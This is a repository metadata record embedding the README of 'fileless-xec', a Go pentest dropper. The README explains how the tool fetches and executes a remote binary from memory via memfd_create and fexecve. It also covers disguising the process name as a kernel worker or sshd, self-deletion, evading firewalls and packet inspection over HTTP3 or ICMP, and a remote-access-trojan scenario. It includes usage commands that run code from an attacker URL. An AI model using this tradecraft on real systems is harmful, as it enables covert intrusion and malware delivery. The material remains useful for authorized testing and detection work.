{"id":13509281,"url":"https://github.com/ariary/fileless-xec","last_synced_at":"2025-04-09T17:23:57.486Z","repository":{"id":49744317,"uuid":"405917716","full_name":"ariary/fileless-xec","owner":"ariary","description":"Stealth dropper executing remote binaries without dropping them on disk .(HTTP3 support, ICMP support, invisible tracks, cross-platform,...)","archived":false,"fork":false,"pushed_at":"2024-07-02T09:08:53.000Z","size":7088,"stargazers_count":195,"open_issues_count":1,"forks_count":39,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-04-02T10:33:29.569Z","etag":null,"topics":["bypass-firewall","dropper","fileless","golang","http3","memfd","pentest","pentest-tool","quic","security","stealth"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-09-13T09:52:54.000Z","updated_at":"2024-12-23T09:36:56.000Z","dependencies_parsed_at":"2024-11-01T09:31:28.456Z","dependency_job_id":"c4912a35-af08-4735-a3ac-2ffaafd941a4","html_url":"https://github.com/ariary/fileless-xec","commit_stats":null,"previous_names":[],"tags_count":7,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ffileless-xec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ffileless-xec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ffileless-xec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ffileless-xec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/fileless-xec/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248075496,"owners_count":21043597,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass-firewall","dropper","fileless","golang","http3","memfd","pentest","pentest-tool","quic","security","stealth"],"created_at":"2024-08-01T02:01:05.608Z","updated_at":"2025-04-09T17:23:57.452Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":["Go","security"],"sub_categories":[],"readme":"\u003ch1 align=center\u003e ➲ fileless-xec 🦜\u003c/h1\u003e\n\n\u003cdiv align=\"center\"\u003e\u003cimg src=\"https://github.com/ariary/fileless-xec/blob/main/img/fileless-small.png\"\u003e\u003c/div\u003e\n\n\u003cdiv align=\"center\"\u003e\n\u003ccode\u003e👋 Certainly useful , mainly for fun, rougly inspired by 0x00 \u003ca href=\"https://0x00sec.org/t/super-stealthy-droppers/3715\"\u003earticle\u003c/a\u003e\u003c/code\u003e\n\u003c/div\u003e\n\u003cbr\u003e\n\n***Pentest use:*** `fileless-xec` is used on target machine to stealthy execute a binary file located on attacker machine\n\n\n\n## ➲ Short story\n\n`fileless-xec` enable us to execute a remote binary on a local machine directly from memory without dropping them on disk\n\n**[➪ Install](https://github.com/ariary/fileless-xec/blob/main/install.md)**\n\n - simple usage `fileless-xec [binary_url]` (~`curl | sh` for binaries)\n - execute binary with specified program name: `fileless-xec -n /usr/sbin/sshd [binary_url]`\n - detach program execution from `tty`: ` fileless-xec --setsid [...]` \n\n![demo](https://github.com/ariary/fileless-xec/blob/main/img/fileless-xec.gif)\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\nWe want to locally execute \u003ccode\u003ewriteNsleep\u003c/code\u003e binary located on a remote machine. \n\nWe first start a python http server on remote.\nLocally we use \u003ccode\u003efileless-xec\u003c/code\u003e and impersonate the \u003ccode\u003e/usr/sbin/sshd\u003c/code\u003e name for the execution of the binary \u003ccode\u003ewriteNsleep\u003c/code\u003e(for stealthiness \u0026 fun). Once writeNsleep start fileless-xec will delete itself (\u003ccode\u003e--self-remove\u003c/code\u003e)\n\n\u003c/details\u003e\n\n### Other use cases\n\n* [Execute binary with stdout/stdin](https://github.com/ariary/fileless-xec/blob/main/usage.md#execute-binary-with-stdoutstdin)\n* [Execute binary with arguments](https://github.com/ariary/fileless-xec/blob/main/usage.md#execute-binary-with-arguments)\n* [`fileless-xec` self remove](https://github.com/ariary/fileless-xec/blob/main/usage.md#fileless-xec-self-remove)\n* [Bypass network restriction using ICMP](https://github.com/ariary/fileless-xec/blob/main/usage.md#bypass-network-restriction-with-icmp)\n* [Bypass firewall with HTTP3](https://github.com/ariary/fileless-xec/blob/main/usage.md#bypass-firewall-with-http3)\n* [\"Remote go\": execute go binaries without having go installed locally](https://github.com/ariary/fileless-xec/blob/main/usage.md#remote-go-execute-go-binaries-without-having-go-installed-locally)\n* [Execute a shell script](https://github.com/ariary/fileless-xec/blob/main/usage.md#execute-a-shell-script)\n* [`fileless-xec` server mode](https://github.com/ariary/fileless-xec/blob/main/usage.md#fileless-xec-server-mode)\n  * [RAT (Remote Access Trojan) scenario](https://github.com/ariary/fileless-xec/blob/main/usage.md#rat-remote-access-trojan-scenario)\n* [`fileless-xec` on windows](https://github.com/ariary/fileless-xec/blob/main/usage.md#fileless-xec-on-windows)\n\n\n## ➲ Stealthiness story\n\n* The binary file is not mapped into the host file system\n* The execution program name could be customizable\n* Bypass 3rd generation firewall could be done with http3 support\n* `fileless-xec` self removes once launched\n\n### memfd_create\nThe remote binary file is stored locally using `memfd_create` syscall, which store it within a _memory disk_ which is not mapped into the file system (*ie* you can't find it using `ls`).\n\n***Note:*** the syscall `memfd_create` does not exist for macOS.\n\n### fexecve\nThen we execute it using `fexecve` syscall (as it is currently not provided by `syscall` golang library we implement it). \n\n\u003e With `fexecve` we could exec a program, but we reference the program to run using a\n\u003e file descriptor, instead of the full path.\n\n### HTTP3/QUIC\n\u003ctable\u003e\u003ctr\u003e\u003ctd\u003e\nEnable it with \u003ccode\u003e-Q\u003c/code\u003e/\u003ccode\u003ehttp3\u003c/code\u003e  flag. \u003cbr\u003e\nYou can setup a light web rootfs server supporting http3 by running \u003ccode\u003ego run ./test/http3/light-server.go -p LISTENING PORT\u003c/code\u003e (This is http3 equivalent of \u003ccode\u003epython3 -m http.server \u003clistening_port\u003e\u003c/code\u003e)\u003cbr\u003e\nuse \u003ccode\u003etest/http3/genkey.sh\u003c/code\u003e to generate cert and key.\n\n \n \u003c/td\u003e\u003c/tr\u003e\u003c/table\u003e\n \n`QUIC` UDP aka `http3` is a new generation Internet protocol that speeds online web applications that are susceptible to delay, such as searching, video streaming etc., by reducing the round-trip time (RTT) needed to connect to a server.\n\nBecause QUIC uses proprietary encryption equivalent to TLS (this will change in the future with a standardized version), **3rd generation firewalls that provide application control and visibility encounter difficulties to control and monitor QUIC traffic**.\n\nIf you actually use `fileless-xec` as a dropper (***Only for testing purpose or with the authorization***), you likely want to execute some type of malwares or other file that could be drop by packet analysis. Hence, with Quic enables you could **bypass packet analysis and GET a malware**.\n\nAlso, in case firewall is only used for allowing/blocking traffic it could happen that **firewall rules forget the udp protocol making your requests go under the radars**\n\n### other skill for stealthiness\n\nAlthough not present on the memory disk, the running program can still be detected using `ps` command for example. \n\n 1. Cover the tracks with a fake program name\n \n`fileless-xec --name \u003cfake_name\u003e \u003cbinary_raw_url\u003e` by default the name is `[kworker/u:0]` \n\n 2. Detach from tty to map behaviour of deamon process\n \n`fileless-xec --setsid \u003cbinary_raw_url\u003e`.\n\n### Caveats\nYou could still be detected with:\n```\n$ lsof | grep memfd\n```\n\nOr also [`opensnoop`](https://github.com/brendangregg/perf-tools/blob/master/opensnoop) (but not by [`execsnoop`](https://github.com/brendangregg/perf-tools/blob/master/execsnoop))\n\nOr seccomp profile auditing `execve` syscall (but it is very overwhelming as a `sleep` command also uses execve for example)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Ffileless-xec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Ffileless-xec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Ffileless-xec/lists"}